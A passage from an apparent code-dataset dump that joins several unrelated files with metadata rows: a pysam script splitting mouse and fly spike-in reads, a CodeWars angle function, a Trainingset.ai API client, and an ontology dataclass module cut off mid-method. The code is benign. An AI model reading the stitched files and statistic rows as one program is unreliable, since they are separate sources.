","211000022279433","211000022279436","211000022279441","211000022279442","211000022279443","211000022279444","211000022279445","211000022279448","211000022279449","211000022279453","211000022279454",
"211000022279456","211000022279462","211000022279464","211000022279465","211000022279469","211000022279470","211000022279473","211000022279474","211000022279476","211000022279477","211000022279479","211000022279481","211000022279483","211000022279487","211000022279488","211000022279490","211000022279493","211000022279498","211000022279503","211000022279506","211000022279507","211000022279508","211000022279509","211000022279510","211000022279513","211000022279516","211000022279523","211000022279526","211000022279527","211000022279533","211000022279549","211000022279551","211000022279554","211000022279556","211000022279559","211000022279562","211000022279564","211000022279569","211000022279572","211000022279573","211000022279574","211000022279580","211000022279584","211000022279590","211000022279591","211000022279592","211000022279593","211000022279599","211000022279603","211000022279606","211000022279609","211000022279612","211000022279615","211000022279618","211000022279619","211000022279622","211000022279623","211000022279624","211000022279626","211000022279627","211000022279628","211000022279631","211000022279632","211000022279633","211000022279635","211000022279637","211000022279641","211000022279644","211000022279648","211000022279651","211000022279652","211000022279653","211000022279654","211000022279655","211000022279656","211000022279657","211000022279659","211000022279660","211000022279663","211000022279664","211000022279666","211000022279668","211000022279671","211000022279672","211000022279675","211000022279682","211000022279684","211000022279685","211000022279696","211000022279710","211000022279712","211000022279722","211000022279723","211000022279724","211000022279726","211000022279727","211000022279728","211000022279729","211000022279733","211000022279736","211000022279737","211000022279738","211000022279740","211000022279741","211000022279742","211000022279747","211000022279748","211000022279749","211000022279750","211000022279754","211000022279756","2110000222797
58","211000022279761","211000022279769","211000022279770","211000022279771","211000022279777","211000022279778","211000022279780","211000022279781","211000022279782","211000022279784","211000022279785","211000022279787","211000022279788","211000022279789","211000022279792","211000022279793","211000022279804","211000022279805","211000022279807","211000022279809","211000022279811","211000022279812","211000022279814","211000022279819","211000022279820","211000022279824","211000022279829","211000022279837","211000022279839","211000022279842","211000022279844","211000022279845","211000022279851","211000022279853","211000022279855","211000022279856","211000022279867","211000022279871","211000022279874","211000022279875","211000022279877","211000022279879","211000022279880","211000022279884","211000022279885","211000022279887","211000022279889","211000022279890","211000022279892","211000022279893","211000022279896","211000022279899","211000022279900","211000022279904","211000022279906","211000022279909","211000022279911","211000022279913","211000022279921","211000022279923","211000022279926","211000022279927","211000022279928","211000022279929","211000022279931","211000022279933","211000022279934","211000022279940","211000022279942","211000022279943","211000022279946","211000022279949","211000022279952","211000022279954","211000022279956","211000022279959","211000022279960","211000022279961","211000022279966","211000022279969","211000022279970","211000022279971","211000022279973","211000022279979","211000022279980","211000022279982","211000022279985","211000022279987","211000022279990","211000022280000","211000022280002","211000022280009","211000022280010","211000022280011","211000022280012","211000022280014","211000022280018","211000022280020","211000022280025","211000022280026","211000022280028","211000022280030","211000022280031","211000022280032","211000022280033","211000022280035","211000022280043","211000022280045","211000022280050","211000022280053","211000022280054
","211000022280056","211000022280064","211000022280065","211000022280068","211000022280069","211000022280071","211000022280074","211000022280075","211000022280076","211000022280079","211000022280083","211000022280084","211000022280085","211000022280086","211000022280089","211000022280097","211000022280102","211000022280106","211000022280108","211000022280110","211000022280112","211000022280114","211000022280115","211000022280117","211000022280120","211000022280121","211000022280123","211000022280124","211000022280130","211000022280133","211000022280135","211000022280139","211000022280140","211000022280141","211000022280143","211000022280144","211000022280150","211000022280151","211000022280152","211000022280153","211000022280154","211000022280156","211000022280159","211000022280160","211000022280161","211000022280162","211000022280164","211000022280165","211000022280168","211000022280174","211000022280176","211000022280177","211000022280178","211000022280179","211000022280180","211000022280181","211000022280183","211000022280191","211000022280192","211000022280193","211000022280194","211000022280195","211000022280196","211000022280198","211000022280205","211000022280206","211000022280208","211000022280210","211000022280211","211000022280212","211000022280218","211000022280220","211000022280221","211000022280223","211000022280224","211000022280225","211000022280226","211000022280228","211000022280230","211000022280232","211000022280233","211000022280235","211000022280236","211000022280237","211000022280240","211000022280247","211000022280255","211000022280256","211000022280257","211000022280259","211000022280260","211000022280261","211000022280262","211000022280266","211000022280268","211000022280269","211000022280272","211000022280283","211000022280289","211000022280290","211000022280291","211000022280292","211000022280293","211000022280294","211000022280295","211000022280296","211000022280297","211000022280298","211000022280301","211000022280302","211000022280303",
"211000022280304","211000022280305","211000022280308","211000022280311","211000022280312","211000022280315","211000022280316","211000022280318","211000022280319","211000022280320","211000022280322","211000022280325","211000022280326","211000022280327","211000022280331","211000022280333","211000022280335","211000022280336","211000022280338","211000022280340","211000022280341","211000022280343","211000022280344","211000022280345","211000022280346","211000022280347","211000022280350","211000022280427","211000022280437","211000022280440","211000022280443","211000022280445","211000022280447","211000022280448","211000022280455","211000022280456","211000022280457","211000022280459","211000022280461","211000022280463","211000022280465","211000022280469","211000022280471","211000022280472","211000022280474","211000022280476","211000022280480","211000022280485","211000022280497","211000022280501","211000022280511","211000022280516","211000022280518","211000022280519","211000022280522","211000022280525","211000022280535","211000022280536","211000022280541","211000022280544","211000022280545","211000022280548","211000022280553","211000022280554","211000022280555","211000022280556","211000022280557","211000022280558","211000022280561","211000022280562","211000022280565","211000022280566","211000022280568","211000022280570","211000022280588","211000022280595","211000022280598","211000022280599","211000022280605","211000022280606","211000022280607","211000022280610","211000022280615","211000022280617","211000022280618","211000022280623","211000022280631","211000022280637","211000022280640","211000022280644","211000022280656","211000022280671","211000022280676","211000022280678","211000022280679","211000022280681","211000022280684","211000022280685","211000022280687","211000022280689","211000022280691","211000022280692","211000022280694","211000022280696","211000022280698","211000022280699","211000022280700","211000022280702","211000022280703","211000022280704","211000022280706","2
11000022280707","211000022280720","211000022280727","211000022280734","211000022280735","211000022280743","211000022280747","211000022280750","211000022280762","XY_mapped_Scaffold_7_D1574","211000022278161","211000022278241","211000022278242","211000022278298","211000022278307","211000022278309","211000022278338","211000022278339","211000022278408","211000022278453","211000022278501","211000022278522","211000022278554","211000022278603","211000022278660","211000022278663","211000022278664","211000022278866","211000022278869","211000022278874","211000022278877","211000022278878","211000022278881","211000022278886","211000022278897","211000022278920","211000022278942","211000022278951","211000022278975","211000022278985","211000022279055","211000022279101","211000022279103","211000022279106","211000022279122","211000022279134","211000022279190","211000022279204","211000022279222","211000022279271","211000022279286","211000022279342","211000022279399","211000022279529","211000022279555","211000022279571","211000022279600","211000022279602","211000022279667","211000022279701","211000022279708","211000022279810","211000022279945","211000022279965","211000022279975","211000022279991","211000022280091","211000022280142","211000022280436","211000022280467","211000022280492","211000022280500","211000022280517","211000022280580","211000022278099","211000022278122","211000022278125","211000022278165","211000022278172","211000022278187","211000022278208","211000022278209","211000022278225","211000022278226","211000022278227","211000022278228","211000022278229","211000022278230","211000022278231","211000022278232","211000022278233","211000022278235","211000022278236","211000022278237","211000022278249","211000022278252","211000022278268","211000022278277","211000022278297","211000022278299","211000022278314","211000022278315","211000022278316","211000022278317","211000022278318","211000022278319","211000022278320","211000022278321","211000022278322","211000022278323","2110000222
78324","211000022278325","211000022278326","211000022278340","211000022278341","211000022278342","211000022278343","211000022278346","211000022278350","211000022278352","211000022278353","211000022278355","211000022278359","211000022278360","211000022278361","211000022278365","211000022278382","211000022278411","211000022278414","211000022278417","211000022278431","211000022278458","211000022278459","211000022278460","211000022278461","211000022278462","211000022278463","211000022278464","211000022278465","211000022278466","211000022278467","211000022278468","211000022278469","211000022278470","211000022278471","211000022278472","211000022278473","211000022278474","211000022278475","211000022278476","211000022278477","211000022278478","211000022278479","211000022278480","211000022278481","211000022278482","211000022278483","211000022278484","211000022278485","211000022278486","211000022278487","211000022278488","211000022278489","211000022278490","211000022278491","211000022278492","211000022278498","211000022278502","211000022278504","211000022278505","211000022278512","211000022278513","211000022278516","211000022278524","211000022278534","211000022278544","211000022278555","211000022278557","211000022278578","211000022278584","211000022278596","211000022278607","211000022278608","211000022278609","211000022278610","211000022278612","211000022278613","211000022278614","211000022278615","211000022278616","211000022278617","211000022278618","211000022278619","211000022278620","211000022278621","211000022278622","211000022278623","211000022278624","211000022278625","211000022278626","211000022278627","211000022278628","211000022278629","211000022278630","211000022278631","211000022278632","211000022278633","211000022278634","211000022278635","211000022278636","211000022278637","211000022278638","211000022278639","211000022278640","211000022278643","211000022278644","211000022278645","211000022278646","211000022278647","211000022278648","211000022278649","211000022278
654","211000022278655","211000022278669","211000022278670","211000022278671","211000022278677","211000022278690","211000022278691","211000022278692","211000022278693","211000022278694","211000022278695","211000022278704","211000022278705","211000022278715","211000022278724","211000022278725","211000022278726","211000022278774","211000022278775","211000022278810","211000022278811","211000022278812","211000022278813","211000022278814","211000022278815","211000022278816","211000022278817","211000022278818","211000022278819","211000022278820","211000022278821","211000022278822","211000022278823","211000022278824","211000022278825","211000022278826","211000022278827","211000022278828","211000022278829","211000022278830","211000022278831","211000022278832","211000022278833","211000022278834","211000022278835","211000022278836","211000022278837","211000022278838","211000022278839","211000022278840","211000022278841","211000022278842","211000022278843","211000022278844","211000022278845","211000022278846","211000022278850","211000022278851","211000022278852","211000022278853","211000022278854","211000022278855","211000022278856","211000022278857","211000022278861","211000022278868","211000022278876","211000022278879","211000022278880","211000022278882","211000022278892","211000022278896","211000022278905","211000022278906","211000022278907","211000022278908","211000022278909","211000022278910","211000022278911","211000022278921","211000022278925","211000022278933","211000022278938","211000022278950","211000022278971","211000022278976","211000022279006","211000022279008","211000022279009","211000022279010","211000022279012","211000022279045","211000022279062","211000022279063","211000022279064","211000022279065","211000022279066","211000022279067","211000022279068","211000022279071","211000022279072","211000022279073","211000022279074","211000022279075","211000022279076","211000022279077","211000022279078","211000022279079","211000022279080","211000022279081","21100002227908
2","211000022279083","211000022279084","211000022279085","211000022279086","211000022279092","211000022279093","211000022279108","211000022279109","211000022279111","211000022279112","211000022279113","211000022279188","211000022279227","211000022279244","211000022279245","211000022279277","211000022279287","211000022279290","211000022279291","211000022279295","211000022279296","211000022279297","211000022279298","211000022279299","211000022279300","211000022279301","211000022279302","211000022279303","211000022279304","211000022279305","211000022279306","211000022279307","211000022279315","211000022279316","211000022279322","211000022279327","211000022279328","211000022279332","211000022279339","211000022279340","211000022279388","211000022279408","211000022279437","211000022279438","211000022279446","211000022279460","211000022279467","211000022279497","211000022279499","211000022279501","211000022279502","211000022279504","211000022279505","211000022279514","211000022279515","211000022279518","211000022279528","211000022279530","211000022279531","211000022279536","211000022279537","211000022279542","211000022279543","211000022279552","211000022279553","211000022279563","211000022279570","211000022279601","211000022279604","211000022279605","211000022279608","211000022279610","211000022279673","211000022279674","211000022279676","211000022279686","211000022279689","211000022279690","211000022279698","211000022279703","211000022279704","211000022279705","211000022279715","211000022279720","211000022279721","211000022279730","211000022279731","211000022279732","211000022279764","211000022279767","211000022279772","211000022279773","211000022279774","211000022279803","211000022279830","211000022279832","211000022279833","211000022279834","211000022279836","211000022279846","211000022279857","211000022279859","211000022279860","211000022279861","211000022279862","211000022279881","211000022279882","211000022279883","211000022279888","211000022279902","211000022279917"
,"211000022279944","211000022279955","211000022279957","211000022279967","211000022279968","211000022279978","211000022279984","211000022279994","211000022279998","211000022280007","211000022280016","211000022280017","211000022280019","211000022280022","211000022280023","211000022280029","211000022280034","211000022280042","211000022280060","211000022280061","211000022280062","211000022280077","211000022280088","211000022280095","211000022280125","211000022280148","211000022280173","211000022280241","211000022280243","211000022280270","211000022280330","211000022280439","211000022280442","211000022280453","211000022280466","211000022280470","211000022280479","211000022280495","211000022280507","211000022280526","211000022280529","211000022280532","211000022280534","211000022280537","211000022280538","211000022280539","211000022280542","211000022280578","211000022280584","211000022280585","211000022280586","211000022280587","211000022280592","211000022280593","211000022280594","211000022280597","211000022280603","211000022280612","211000022280620","211000022280622","211000022280624","211000022280625","211000022280628","211000022280629","211000022280632","211000022280633","211000022280639","211000022280641","211000022280642","211000022280645","211000022280649","211000022280657","211000022280668","211000022280669","211000022278135","211000022278142","211000022278153","211000022278201","211000022278214","211000022278218","211000022278278","211000022278405","211000022278418","211000022278436","211000022278449","211000022278450","211000022278495","211000022278499","211000022278509","211000022278510","211000022278538","211000022278565","211000022278577","211000022278586","211000022278601","211000022278682","211000022278683","211000022278684","211000022278709","211000022278710","211000022278722","211000022278734","211000022278736","211000022278743","211000022278756","211000022278760","211000022278772","211000022278787","211000022278791","211000022278795","211000022278798","
211000022278802","211000022278803","211000022278872","211000022278873","211000022278895","211000022278935","211000022278936","211000022278939","211000022278941","211000022278956","211000022278959","211000022278965","211000022278984","211000022278987","211000022278990","211000022278995","211000022278997","211000022279005","211000022279007","211000022279025","211000022279026","211000022279030","211000022279031","211000022279034","211000022279046","211000022279047","211000022279090","211000022279104","211000022279123","211000022279137","211000022279153","211000022279164","211000022279165","211000022279174","211000022279181","211000022279186","211000022279211","211000022279224","211000022279235","211000022279236","211000022279261","211000022279264","211000022279266","211000022279268","211000022279269","211000022279272","211000022279279","211000022279280","211000022279314","211000022279319","211000022279333","211000022279334","211000022279335","211000022279352","211000022279377","211000022279382","211000022279385","211000022279391","211000022279392","211000022279403","211000022279404","211000022279410","211000022279452","211000022279458","211000022279459","211000022279468","211000022279484","211000022279485","211000022279486","211000022279491","211000022279492","211000022279494","211000022279496","211000022279511","211000022279532","211000022279546","211000022279550","211000022279560","211000022279582","211000022279583","211000022279586","211000022279589","211000022279639","211000022279642","211000022279646","211000022279649","211000022279661","211000022279669","211000022279670","211000022279677","211000022279678","211000022279679","211000022279680","211000022279681","211000022279688","211000022279709","211000022279725","211000022279755","211000022279791","211000022279795","211000022279799","211000022279800","211000022279801","211000022279802","211000022279813","211000022279831","211000022279835","211000022279870","211000022279876","211000022279901","211000022279907","21
1000022279908","211000022279910","211000022279918","211000022279932","211000022279935","211000022279936","211000022279937","211000022279938","211000022279941","211000022279950","211000022279951","211000022279963","211000022279972","211000022279974","211000022279986","211000022279988","211000022279989","211000022279995","211000022279999","211000022280024","211000022280040","211000022280044","211000022280057","211000022280072","211000022280090","211000022280116","211000022280138","211000022280157","211000022280187","211000022280481","211000022280483","211000022280494","211000022280504","211000022280619","211000022280686","211000022280742","211000022280748","211000022280763"]
##########
# Categorize read names
##########
mouse = set()
fly = set()
both = set()
inSam = pysam.AlignmentFile(args.allSamFile, "rb")
# Multiple alignments of a read are reported individually.
for read in inSam:
    if not read.is_unmapped:
        if read.reference_name in spikeChroms:
            # Mapped to spike-in reference (fly).
            fly.add(read.query_name)
        else:
            # Mapped to reference of interest (mouse).
            mouse.add(read.query_name)
inSam.close()
# Distinguish multimappers.
both = mouse & fly # It's mapped to both mouse and fly
mouse = mouse - both # Only to mouse
fly = fly - both # Only to fly
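The multimapper bookkeeping above is plain set algebra; a minimal sketch with hypothetical read names (toy IDs, not real data) shows the three-way partition:

```python
# Hypothetical read-name sets standing in for the pysam-derived ones above.
m = {"r1", "r2", "r3"}   # reads with at least one mouse alignment
f = {"r3", "r4"}         # reads with at least one fly (spike-in) alignment

shared = m & f           # aligned to both references -> ambiguous
m_only = m - shared      # uniquely assignable to mouse
f_only = f - shared      # uniquely assignable to fly

print(sorted(m_only), sorted(f_only), sorted(shared))  # -> ['r1', 'r2'] ['r4'] ['r3']
```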
##########
# Categorize reads
##########
prefix = re.sub(r"\.sam$|\.bam$", "", os.path.basename(args.allSamFile))
prefix = re.sub(r"\.deduped|\.aln", "", prefix)
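A quick check of the prefix derivation on a hypothetical filename (the path is made up for illustration; escaped dots keep the patterns literal):

```python
import os
import re

# Hypothetical input path; mirrors the two-step prefix cleanup above.
demo_name = os.path.basename("/data/sample1.deduped.aln.bam")
demo_prefix = re.sub(r"\.sam$|\.bam$", "", demo_name)      # drop the extension
demo_prefix = re.sub(r"\.deduped|\.aln", "", demo_prefix)  # drop pipeline suffixes
print(demo_prefix)  # -> sample1
```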
# Re-open input from the start.
inSam = pysam.AlignmentFile(args.allSamFile, "rb")
# Mapped only to the reference of interest (mouse).
outMouse = pysam.AlignmentFile(os.path.join(args.outDir, prefix + "_subject.bam"), "wb", template=inSam)
# Mapped only to the spike-in reference (fly).
outFly = pysam.AlignmentFile(os.path.join(args.outDir, prefix + "_spikein.bam"), "wb", template=inSam)
# Mapped to both references, i.e. ambiguous multimappers.
outBoth = pysam.AlignmentFile(os.path.join(args.outDir, prefix + "_ambiguous.bam"), "wb", template=inSam)
for read in inSam:
    # Discard unmapped reads.
    if not read.is_unmapped:
        if read.query_name in mouse:
            outMouse.write(read)
        elif read.query_name in fly:
            outFly.write(read)
        elif read.query_name in both:
            outBoth.write(read)
inSam.close()
outMouse.close()
outFly.close()
outBoth.close()
| 386.21875 | 32,697 | 0.821884 | 2,422 | 37,077 | 12.50289 | 0.864575 | 0.011558 | 0.005944 | 0.002378 | 0.010435 | 0.010435 | 0.007859 | 0.004359 | 0 | 0 | 0 | 0.754298 | 0.014807 | 37,077 | 95 | 32,698 | 390.284211 | 0.07471 | 0.02538 | 0 | 0.177778 | 0 | 0 | 0.799472 | 0.036225 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.066667 | 0 | 0.066667 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2d0e785722a643a0751d95a2dc1fc6715ab01384 | 35 | py | Python | CodeWars/Python/030-Sum_of_angles.py | IsFilimonov/Interviews | 261b59cd80e1451804c37b03b4cce7c1b63f609d | [
"MIT"
] | 2 | 2021-05-09T22:39:49.000Z | 2021-09-16T12:44:09.000Z | CodeWars/Python/030-Sum_of_angles.py | IsFilimonov/Interviews | 261b59cd80e1451804c37b03b4cce7c1b63f609d | [
"MIT"
] | null | null | null | CodeWars/Python/030-Sum_of_angles.py | IsFilimonov/Interviews | 261b59cd80e1451804c37b03b4cce7c1b63f609d | [
"MIT"
] | null | null | null | def angle(n):
    # Sum of the interior angles of an n-sided polygon, in degrees.
    return (n - 2) * 180
| 11.666667 | 20 | 0.571429 | 7 | 35 | 2.857143 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 0.228571 | 35 | 2 | 21 | 17.5 | 0.592593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
7487994641381887e98fd23f0957f62499e652eb | 11,298 | py | Python | trainingsetai/__init__.py | trainingset-ai/trainingsetai-python-sdk | b5c412044cc649f0527a9ae82e0641132d901b04 | [
"MIT"
] | 1 | 2021-01-19T08:22:56.000Z | 2021-01-19T08:22:56.000Z | trainingsetai/__init__.py | trainingset-ai/trainingsetai-python-sdk | b5c412044cc649f0527a9ae82e0641132d901b04 | [
"MIT"
] | null | null | null | trainingsetai/__init__.py | trainingset-ai/trainingsetai-python-sdk | b5c412044cc649f0527a9ae82e0641132d901b04 | [
"MIT"
] | null | null | null | import requests
BASE_URL = "https://api.trainingset.ai/api"
class TrainingsetException(Exception):
    def __init__(self, message, status_code):
        super(TrainingsetException, self).__init__(
            '<Response [{}]> {}'.format(status_code, message))
        self.code = status_code
class TrainingsetInvalidRequest(TrainingsetException, ValueError):
pass
class TrainingsetClient:
def __init__(self, api_key):
self.session = requests.Session()
self.session.headers.update({'user_key': api_key})
def _get_request(self, endpoint, params={}):
r = self.session.get(BASE_URL + endpoint, params=params)
if r.status_code == 200:
return r.json()
else:
try:
error = r.json()
except ValueError:
error = r.text
if r.status_code == 400:
raise TrainingsetInvalidRequest(
error["message"], r.status_code)
else:
raise TrainingsetException(error, r.status_code)
    def _post_request(self, endpoint, data):
        r = self.session.post(BASE_URL + endpoint, json=data)
        if r.status_code == 200:
            return r.json()
        else:
            try:
                error = r.json()
            except ValueError:
                error = r.text
            if r.status_code == 400:
                raise TrainingsetInvalidRequest(
                    error["message"], r.status_code)
            else:
                raise TrainingsetException(error, r.status_code)
    def get_tasks(self, parameters={}):
        """
        Returns a list of tasks.

        parameters object:
        `sort`: [["attribute_name", 1 or -1]], example: [["_id", 1]]; 1 is ascending, -1 is descending
        `rangeStart`: YYYY-MM-DD, example: "2020-01-31"
        `rangeEnd`: YYYY-MM-DD, example: "2020-12-31"
        `type`: "annotation-box" | "annotation-line" | "annotation-polygon" | "annotation-pcd" | "categorization-image" | "segmentation"
        `status`: "pending" | "completed" | "cancelled" | "error" | "ready" | "working"
        `project`: string, project ID, example: "5f6359d0838a1d868f54cac4"
        `limit`: integer
        `skip`: integer
        `id`: string, ID of the task
        `qa_status`: "accepted" | "pending" | "rejected"

        Check the documentation for more info:
        https://documenter.getpostman.com/view/10426338/Szf9V75M?version=latest#783c6a4f-373a-4559-a68a-30cd98808d73
        """
        return self._get_request("/task/by-custom-filter", parameters)
    def delete_task(self, task_id):
        """
        Deletes a task.
        """
        response = self.session.delete(BASE_URL + "/task/" + task_id)
        return response.json()
    def create_box_annotation_task(self, task):
        """
        Creates a box type annotation task.

        task object:
        `instructions`: Instructions for completing the task (Required) (String)
        `attachment_url`: HTTP/HTTPS address of the image the task is carried out on (Required) (String)
        `min_height`: Minimum height of each box drawn in the task (Optional) (Number)
        `min_width`: Minimum width of each box drawn in the task (Optional) (Number)
        `with_labels`: Define whether the task has tags (Optional) (Boolean)
        `objects_to_annotate`: List of objects to be annotated (Optional) (AnnotationObject Array)
        `project`: Name of the project the task belongs to (Optional) (String)
        `callback_url`: URL to which task results will be delivered (Optional) (String)
        `automatic_prelabel`: Automatically prelabel the picture (Optional) (Boolean)

        Check the documentation for more info:
        https://documenter.getpostman.com/view/10426338/Szf9V75M?version=latest#783c6a4f-373a-4559-a68a-30cd98808d73
        """
        return self._post_request("/task/annotation/box", task)
    def create_line_annotation_task(self, task):
        """
        Creates a line type annotation task.

        task object:
        `instructions`: Instructions for completing the task (Required) (String)
        `attachment_url`: HTTP/HTTPS address of the image the task is carried out on (Required) (String)
        `min_vertices`: Minimum number of vertices a line drawn in the task must have (Optional) (Number)
        `max_vertices`: Maximum number of vertices a line drawn in the task must have (Optional) (Number)
        `with_labels`: Define whether the task has tags (Optional) (Boolean)
        `objects_to_annotate`: List of objects to be annotated (Optional) (AnnotationObject Array)
        `project`: Name of the project the task belongs to (Optional) (String)
        `callback_url`: URL to which task results will be delivered (Optional) (String)
        `automatic_prelabel`: Automatically prelabel the picture (Optional) (Boolean)

        Check the documentation for more info:
        https://documenter.getpostman.com/view/10426338/Szf9V75M?version=latest#783c6a4f-373a-4559-a68a-30cd98808d73
        """
        return self._post_request("/task/annotation/line", task)
    def create_polygon_annotation_task(self, task):
        """
        Creates a polygon type annotation task.

        task object:
        `instructions`: Instructions for completing the task (Required) (String)
        `attachment_url`: HTTP/HTTPS address of the image the task is carried out on (Required) (String)
        `min_vertices`: Minimum number of vertices a polygon drawn in the task must have (Optional) (Number)
        `max_vertices`: Maximum number of vertices a polygon drawn in the task must have (Optional) (Number)
        `with_labels`: Define whether the task has tags (Optional) (Boolean)
        `objects_to_annotate`: List of objects to be annotated (Optional) (AnnotationObject Array)
        `project`: Name of the project the task belongs to (Optional) (String)
        `callback_url`: URL to which task results will be delivered (Optional) (String)
        `automatic_prelabel`: Automatically prelabel the picture (Optional) (Boolean)

        Check the documentation for more info:
        https://documenter.getpostman.com/view/10426338/Szf9V75M?version=latest#783c6a4f-373a-4559-a68a-30cd98808d73
        """
        return self._post_request("/task/annotation/polygon", task)
    def create_point_annotation_task(self, task):
        """
        Creates a point type annotation task.

        task object:
        `instructions`: Instructions for completing the task (Required) (String)
        `attachment_url`: HTTP/HTTPS address of the image the task is carried out on (Required) (String)
        `with_labels`: Define whether the task has tags (Optional) (Boolean)
        `objects_to_annotate`: List of objects to be annotated (Optional) (AnnotationObject Array)
        `project`: Name of the project the task belongs to (Optional) (String)
        `callback_url`: URL to which task results will be delivered (Optional) (String)
        `automatic_prelabel`: Automatically prelabel the picture (Optional) (Boolean)

        Check the documentation for more info:
        https://documenter.getpostman.com/view/10426338/Szf9V75M?version=latest#783c6a4f-373a-4559-a68a-30cd98808d73
        """
        return self._post_request("/task/annotation/point", task)
    def create_point_cloud_annotation_task(self, task):
        """
        Creates a point cloud (PCD) annotation task.

        task object:
        `instructions`: Instructions for completing the task (Required) (String)
        `attachment_url`: HTTP/HTTPS address of the point cloud attachment the task is carried out on (Required) (String)
        `with_labels`: Define whether the task has tags (Optional) (Boolean)
        `objects_to_annotate`: List of objects to be annotated (Optional) (AnnotationObject Array)
        `project`: Name of the project the task belongs to (Optional) (String)
        `callback_url`: URL to which task results will be delivered (Optional) (String)
        `cameras`: Camera parameters, each camera is an object (Optional) (CameraObject Array)

        Check the documentation for more info:
        https://documenter.getpostman.com/view/10426338/Szf9V75M?version=latest#783c6a4f-373a-4559-a68a-30cd98808d73
        """
        return self._post_request("/task/annotation/pcd", task)
    def create_segmentation_task(self, task):
        """
        Creates a segmentation task.

        task object:
        `instructions`: Instructions for completing the task (Required) (String)
        `attachment_url`: HTTP/HTTPS address of the image the task is carried out on (Required) (String)
        `with_labels`: Define whether the task has tags (Optional) (Boolean)
        `objects_to_annotate`: List of objects to be annotated (Optional) (AnnotationObject Array)
        `project`: Name of the project the task belongs to (Optional) (String)
        `callback_url`: URL to which task results will be delivered (Optional) (String)
        `automatic_prelabel`: Automatically prelabel the picture (Optional) (Boolean)

        Check the documentation for more info:
        https://documenter.getpostman.com/view/10426338/Szf9V75M?version=latest#783c6a4f-373a-4559-a68a-30cd98808d73
        """
        return self._post_request("/task/annotation/segmentation", task)
def create_image_categorization_task(self, task):
"""
        Creates an image categorization task.
task object:
`instructions`: Instructions for drawing the task (Required) (String)
`categories`: Categories into which an image can be categorized (Required) (String Array)
`attachment_url`: HTTP/HTTPS Image address where the drawing of the task is carried out (Required) (String)
`allow_multiple`: Allow multiple categories to be selected (Optional) (Boolean)
`with_labels`: Define if the task has tags (Optional) (Boolean)
`project`: Name of the project that belongs to the task (Optional) (String)
`callback_url`: URL to which you will get task results delivered (Optional) (String)
Check the documentation for more info:
https://documenter.getpostman.com/view/10426338/Szf9V75M?version=latest#783c6a4f-373a-4559-a68a-30cd98808d73
"""
return self._post_request("/task/categorization/image", task)
def create_project(self, project_name, summary, instructions, automatic_prelabel, automatic_label):
"""
Creates a new project.
"""
return self._post_request("/project", {
"name": project_name,
"summary": summary,
"instructions": instructions,
"automatic_prelabel": automatic_prelabel,
"automatic_label": automatic_label,
})
def get_projects(self):
"""
Fetches a list of projects.
"""
return self._get_request("/project")
def delete_project(self, project_id):
"""
        Deletes a project by its identifier.
"""
        response = self.session.delete(BASE_URL + "/project/" + str(project_id))
return response.json()
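# A minimal usage sketch for the categorization endpoint above. Everything
# concrete here (URL, labels, field values) is invented for illustration;
# only the field names come from the docstrings.

```python
REQUIRED_FIELDS = ("instructions", "categories", "attachment_url")

def build_categorization_task(instructions, categories, attachment_url, **optional):
    """Assemble the task dict expected by create_image_categorization_task
    and fail early if a field the API marks Required is empty."""
    task = {
        "instructions": instructions,
        "categories": list(categories),
        "attachment_url": attachment_url,
        **optional,
    }
    missing = [f for f in REQUIRED_FIELDS if not task.get(f)]
    if missing:
        raise ValueError("missing required fields: " + ", ".join(missing))
    return task

task = build_categorization_task(
    "Pick the label that best describes the image",
    ["cat", "dog"],
    "https://example.com/image.png",   # hypothetical attachment
    allow_multiple=False,
)
# client.create_image_categorization_task(task) would then POST it.
```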
| 37.287129 | 155 | 0.658789 | 1,328 | 11,298 | 5.498494 | 0.145331 | 0.033552 | 0.018488 | 0.026294 | 0.744864 | 0.73966 | 0.726787 | 0.726787 | 0.726787 | 0.71857 | 0 | 0.037641 | 0.245176 | 11,298 | 302 | 156 | 37.410596 | 0.818598 | 0.614622 | 0 | 0.356164 | 0 | 0 | 0.101337 | 0.042793 | 0 | 0 | 0 | 0 | 0 | 1 | 0.219178 | false | 0.013699 | 0.013699 | 0 | 0.465753 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
77879300dbcba02b4e42942f60db7bbf45785e2e | 590 | py | Python | sm_widgets/models/ontology.py | binh-vu/sm-gui | dd5faa09b7570762aa63bf9f2ff88081cf132db4 | [
"MIT"
] | null | null | null | sm_widgets/models/ontology.py | binh-vu/sm-gui | dd5faa09b7570762aa63bf9f2ff88081cf132db4 | [
"MIT"
] | null | null | null | sm_widgets/models/ontology.py | binh-vu/sm-gui | dd5faa09b7570762aa63bf9f2ff88081cf132db4 | [
"MIT"
] | null | null | null | from dataclasses import dataclass, field
from typing import List, Set
@dataclass
class OntClass:
uri: str
label: str
aliases: List[str]
description: str
parents: List[str]
parents_closure: Set[str] = field(default_factory=set)
@property
def readable_label(self):
return self.label
@dataclass
class OntProperty:
uri: str
label: str
aliases: List[str]
description: str
parents: List[str]
parents_closure: Set[str] = field(default_factory=set)
@property
def readable_label(self):
